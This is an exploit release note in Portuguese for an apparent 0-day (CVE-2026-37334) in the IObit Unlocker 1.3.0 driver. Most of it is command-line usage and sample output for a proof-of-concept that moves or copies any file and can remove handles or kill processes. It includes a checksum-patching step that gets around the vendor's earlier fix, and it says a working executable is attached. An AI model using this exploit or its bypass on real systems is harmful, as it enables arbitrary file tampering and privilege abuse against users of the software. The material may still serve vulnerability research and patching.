
(0 day) CVE-2026-37334 Move ou copia qualquer arquivo. Contorna o patch anterior com um truque de checksum. IObit Unlocker v. 1.3.0
(0 day) Move ou Copia qualquer arquivo. Contorna o patch anterior com um truque de checksum.
Writeup: https://nathan2.com/files/iobit.pdf Informações gerais: https://nathan2.com/posts/iobit/
Descobri isso sem saber que já existia outro exploit anterior que descobriu isso primeiro. No entanto, este contorna o patch que a IObit fez. Funciona na versão 1.3.0
Uso:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- Enviando Requisição ---
Origem: C:\copied.txt
Destino: C:\t.txt
Subtipo: 4 | Flags: 1
IOCTL Bem-sucedido. O driver retornou 4 bytes.
Verificação: O arquivo de destino existe/está acessível.
Mais flags:
Uso: UnlockerCLI.exe <CaminhoOrigem> <CaminhoDestino> <Subtipo> <Flags>
Exemplo: UnlockerCLI.exe "C:\Caminho Com Espaço\arquivo.txt" "C:\backup\arquivo.txt" 3 (subtipo) 5 (flag de operação)
Subtipos: (pelo menos os que eu uso) 3=move, 4=copy
Flags de Operação: 0=Não remover handle, 1 = remover handles, 2 = matar processos com handles, 4 = matar processos e remover handles, 5??? experimente.
O executável anexado deve ser funcional e já corrigido. Se não for, leia abaixo.
Use o patcher de checksum para corrigir o PoC. Assim:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
Tamanho Original do Arquivo: 235449 bytes
Soma Alternada Atual: 11044471
Soma XOR Atual: 43
O arquivo já possui os checksums corretos. Nenhuma alteração necessária.
Isso permitirá que o executável se comunique com o driver IObitUnlocker.